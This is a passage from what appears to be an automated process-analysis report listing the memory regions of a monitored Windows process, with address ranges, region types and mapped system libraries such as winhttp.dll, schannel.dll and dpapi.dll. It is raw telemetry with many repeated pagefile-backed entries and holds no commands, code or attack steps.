0x7ffc55fe1fff monitored = 0 entry_point = 0x7ffc55cb1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2459 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2460 start_va = 0x7ffc5bab0000 end_va = 0x7ffc5badcfff monitored = 0 entry_point = 0x7ffc5bac9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2507 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2508 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2509 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 2560 start_va = 0x7ffc54160000 end_va = 0x7ffc54174fff monitored = 0 entry_point = 0x7ffc54162dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 2561 start_va = 0x7ffc55820000 end_va = 0x7ffc55857fff monitored = 0 entry_point = 0x7ffc55838cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2562 start_va = 0x7ffc57e70000 end_va = 0x7ffc57f37fff monitored = 0 entry_point = 0x7ffc57eb13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2563 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 2564 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 2624 start_va = 0x7ffc5b700000 end_va = 0x7ffc5b75bfff monitored = 0 entry_point = 0x7ffc5b716f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2625 start_va = 0x7ffc55860000 end_va = 0x7ffc5586afff monitored = 0 entry_point = 0x7ffc55861d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2818 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2882 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 2947 start_va = 0x7ffc4e6d0000 end_va = 0x7ffc4e887fff monitored = 0 entry_point = 0x7ffc4e73e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 2948 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3099 start_va = 0x420000 end_va = 0x421fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3100 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 3101 start_va = 0x4800000 end_va = 0x4bfafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004800000" filename = "" Region: id = 3102 start_va = 0x7ffc5b380000 end_va = 0x7ffc5b3f9fff monitored = 0 entry_point = 0x7ffc5b3a1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 3203 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3204 start_va = 0x7ffc4bd50000 end_va = 0x7ffc4bd63fff monitored = 0 entry_point = 0x7ffc4bd53710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 3205 start_va = 0x7ffc5b9a0000 end_va = 0x7ffc5b9c6fff monitored = 0 entry_point = 0x7ffc5b9b0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 3206 start_va = 0x7ffc5b960000 end_va = 0x7ffc5b999fff monitored = 0 entry_point = 0x7ffc5b968d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 3207 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3208 start_va = 0x7ffc5b480000 end_va = 0x7ffc5b489fff monitored = 0 entry_point = 0x7ffc5b481830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 3209 start_va = 0x7ffc5c360000 end_va = 0x7ffc5c3b4fff monitored = 0 entry_point = 0x7ffc5c377970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3210 start_va = 0x7ffc5b7b0000 end_va = 0x7ffc5b7c6fff monitored = 0 entry_point = 0x7ffc5b7b79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3211 start_va = 0x7ffc5b440000 end_va = 0x7ffc5b473fff monitored = 0 entry_point = 0x7ffc5b45ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3212 start_va = 0x7ffc5b8d0000 end_va = 0x7ffc5b8dafff monitored = 0 entry_point = 0x7ffc5b8d19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3213 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 3223 start_va = 0x7ffc5ae30000 end_va = 0x7ffc5ae53fff monitored = 0 entry_point = 0x7ffc5ae33260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3224 start_va = 0x7ffc4bc20000 end_va = 0x7ffc4bc4efff monitored = 0 entry_point = 0x7ffc4bc2ec60 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 3536 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 3807 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 3808 start_va = 0x7ffc55190000 end_va = 0x7ffc551a5fff monitored = 0 entry_point = 0x7ffc551919f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3809 start_va = 0x7ffc54b20000 end_va = 0x7ffc54b39fff monitored = 0 entry_point = 0x7ffc54b22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3810 start_va = 0x7ffc54080000 end_va = 0x7ffc540fffff monitored = 0 entry_point = 0x7ffc540ad280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3811 start_va = 0x600000 end_va = 0x604fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 3812 start_va = 0x610000 end_va = 0x61ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 3814 start_va = 0x7ffc538e0000 end_va = 0x7ffc538e9fff monitored = 0 entry_point = 0x7ffc538e14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3815 start_va = 0x7ffc54680000 end_va = 0x7ffc546e6fff monitored = 0 entry_point = 0x7ffc546863e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4136 start_va = 0x7ffc58360000 end_va = 0x7ffc58388fff monitored = 0 entry_point = 0x7ffc5836ca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 4147 start_va = 0x620000 end_va = 0x647fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4173 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 4197 start_va = 0x620000 end_va = 0x621fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4198 start_va = 0x630000 end_va = 0x631fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 4201 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 4203 start_va = 0x7ffc4be00000 end_va = 0x7ffc4be1dfff monitored = 0 entry_point = 0x7ffc4be0ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 5138 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 5139 start_va = 0x630000 end_va = 0x651fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 5201 start_va = 0x660000 end_va = 0x671fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 5202 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5203 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5204 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5205 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5206 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5207 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5208 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5209 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5210 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5211 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5212 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5213 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5214 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5215 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5216 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5217 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5218 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5219 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5220 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5269 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5270 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5271 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5272 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5273 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5274 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5275 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5276 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5277 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5278 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5279 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5280 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5281 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5282 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5283 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5284 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5285 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5286 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5287 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5288 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5289 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5290 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5291 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5292 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5293 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5294 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5342 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5343 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5344 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5345 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5346 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5347 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5348 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5349 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5350 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5351 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5352 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5353 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5354 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5355 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5356 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5357 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5358 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5359 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5360 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5361 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5362 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5363 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5364 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5409 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5410 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5411 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5412 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5413 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5414 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5415 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5416 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5417 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5418 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5419 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5420 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5421 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5422 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5423 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5424 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5425 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5426 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5427 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5471 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5472 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5473 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5474 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5475 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5476 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5477 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5478 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5479 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5480 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5481 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5482 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5483 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5484 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5485 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5486 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5487 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5488 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5489 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5490 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5491 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5492 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5537 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5538 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5539 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5540 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5541 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5542 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" 